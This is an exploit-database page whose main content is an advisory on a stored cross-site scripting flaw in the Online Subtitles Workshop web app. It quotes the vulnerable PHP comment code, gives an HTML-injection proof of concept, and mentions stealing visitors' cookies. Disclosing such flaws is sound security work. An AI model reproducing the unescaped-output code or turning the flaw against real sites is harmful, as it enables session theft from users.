0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Online Subtitles Workshop XSS Vulnerability
=================================================================================== Online Subtitles Workshop XSS vulnerabilities =================================================================================== # Exploit Title: Online Subtitles Workshop XSS vulnerabilities # Author: M.Jock3R (www.the-code.tk) # Script Download: http://sourceforge.net/projects/onlinesubtitles/files/ # Category:: webapps # Tested on: windows XP Sp2 FR =================================================================================== Vuln file: video_comments.php Vuln code: --------- $all_comments = read_video_comments($video_id); //print_r($all_comments); $video_comments = ""; for ($i = 0; $i <= count($all_comments)-1; $i++) { $video_comments = $video_comments . " <table style='width:100%'> <tr> <td style='width:100%'> ".get_user_name($all_comments[$i]['id'])." </td> <td> ".date('h:i:s A m-d-Y ', $all_comments[$i]['time'])." </td> </tr> <tr> <td colspan='7'> ".$all_comments[$i]['message']." <== Here you can inject any HTML or Javascript code :) </td> </tr> </table> <br> "; Exploit: --------- First,Choose any video. Go to comments, and write for example : <marquee><font color=red size=15>M.jock3r</font>/marquee> -Or you can steal the cookies of any one browse the video page :) =================================================================================== Greets To : the C0de team / sa-hacker.com Email : madrido.jocker@gmail.com THANKS TO ALL ALGERIANS HACK3RS =================================================================================== # 0day.today [2024-12-26] #